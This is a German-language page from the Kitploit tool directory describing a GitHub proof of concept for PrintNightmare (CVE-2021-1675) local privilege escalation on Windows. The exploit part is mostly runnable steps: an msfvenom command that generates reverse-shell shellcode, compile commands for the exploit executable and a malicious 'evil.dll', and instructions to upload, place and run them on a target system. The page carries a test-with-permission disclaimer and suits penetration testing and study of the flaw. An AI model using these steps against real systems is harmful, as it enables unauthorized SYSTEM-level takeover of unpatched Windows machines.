Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-1675 — Lokaler Privilege-Escalation-Exploit für CVE-2021-1675 (PrintNightmare), der eine schädliche DLL installiert, um auf verwundbaren Windows-Systemen SYSTEM-Zugriff zu erlangen. | Kitploit
Tools/GitHubGitHub/andrewtrube/cve-2021-1675
Privilege EscalationExploit-FrameworksExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubandrewtrube/cve-2021-1675

CVE-2021-1675

Lokaler Privilege-Escalation-Exploit für CVE-2021-1675 (PrintNightmare), der eine schädliche DLL installiert, um auf verwundbaren Windows-Systemen SYSTEM-Zugriff zu erlangen.

Repository anzeigen
51vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PrintNightmare Local Privilege Escalation PoC

src/nightmare.cpp: Quellcode zur Ausnutzung von CVE-2021-1675 und Erlangung von Systemzugriff durch Installation einer bösartigen DLL
src/payload-dll.cpp: Quellcode für DLL mit bösartigem Shellcode in der Einstiegsfunktion

!!Nur gegen Server verwenden, auf denen du die Erlaubnis zum Testen hast

Zusammenfassung

CVE-2021-1675 ist eine Schwachstelle im Print Spooler-Dienst von Microsoft Windows, die es einem Angreifer ermöglicht, die SeLoadDriverPrivilege-Prüfung zu umgehen. Dies kann genutzt werden, um eine Privilegienausweitung auf dem Zielsystem zu erreichen, indem eine bösartige DLL installiert wird, die Shellcode aufruft oder die Windows-API verwendet, um eine Reverse- Shell-Verbindung herzustellen. Versionen von Windows 10/8/Server 2008/Server 2012 vor dem 8. Juni 2021 sind betroffen.

POC

  1. Git-Repo herunterladen oder klonen
  2. msfvenom verwenden, um einen geeigneten Payload in C zu generieren $ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f c
  3. Die Ausgabe von msfvenom in payload-dll.cpp einfügen, wo „change me“ steht
  4. Die Hauptausführungsdatei kompilieren x86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspool
  5. Die DLL kompilieren x86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -shared
  6. Die EXE und DLL archivieren und dann einen Weg finden, das Archiv auf das Zielsystem hochzuladen zip ./bin/PrinterNightmareLPE.exe ./lib/
  7. Sobald das Archiv auf dem Ziel-Windows-System ist, es extrahieren
  8. evil.dll nach c:\windows\temp\evil.dll verschieben
  9. PrintNightmareLPE.exe ausführen

Hinweise

  • Wenn alles ordnungsgemäß funktioniert, sollte der Exploit die Windows-Druckertreiber durchlaufen und die Ergebnisse ausgeben
  • Du kannst den Dateipfad, aus dem PrintNightmareLPE.exe die evil.dll lädt, im Quellcode ändern
  • Derzeit lädt die bösartige DLL nur calc.exe als Proof-of-Concept
Tool herunterladen